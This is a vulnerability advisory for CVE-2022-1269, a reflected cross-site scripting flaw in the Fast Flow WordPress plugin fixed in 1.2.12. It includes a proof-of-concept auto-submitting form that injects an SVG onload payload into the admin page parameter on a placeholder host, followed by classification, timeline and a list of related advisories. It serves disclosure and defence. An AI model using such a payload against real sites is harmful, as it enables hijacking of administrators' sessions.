Fast Flow < 1.2.12 – Reflected Cross-Site Scripting | CVE 2022-1269 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the page parameter before outputting back in an attribute in an admin dashboard, leading to a Reflected Cross-Site Scripting

Proof of Concept

<form action="https://example.com/wp-admin/admin.php?page=fast-tagger" method="post" name="form1">
   <input type="text" name="page" value='"><svg/onload=alert(/xss/)>'>
  <button type="submit"></button>
</form>
<script>
   document.form1.submit();
</script>

Affects Plugins

fast-flow-dashboard

Fixed in 1.2.12

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

p7e4

Submitter

p7e4

Submitter website

https://github.com/p7e4

Submitter twitter

Verified

Yes

WPVDB ID

65ff0e71-0fcd-4357-9b00-143cb18901bf

Timeline

Publicly Published

2022-04-11 (about 2 years ago)

Added

2022-04-11 (about 2 years ago)

Last Updated

2022-08-12 (about 1 years ago)

Other

Published

Title

Published

2022-08-29

Title

Visual Composer Website Builder < 45.0.1 - Authenticated Stored XSS via Title

Published

2023-05-31

Title

WordPress Social Login <= 3.0.4 - Reflected XSS

Published

2017-11-29

Title

WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping

Published

2023-09-26

Title

flowpaper < 2.0.4 - Contributor+ Stored XSS

Published

2023-04-19

Title

Continuous announcement scroller <= 13.0 - Admin+ Stored XSS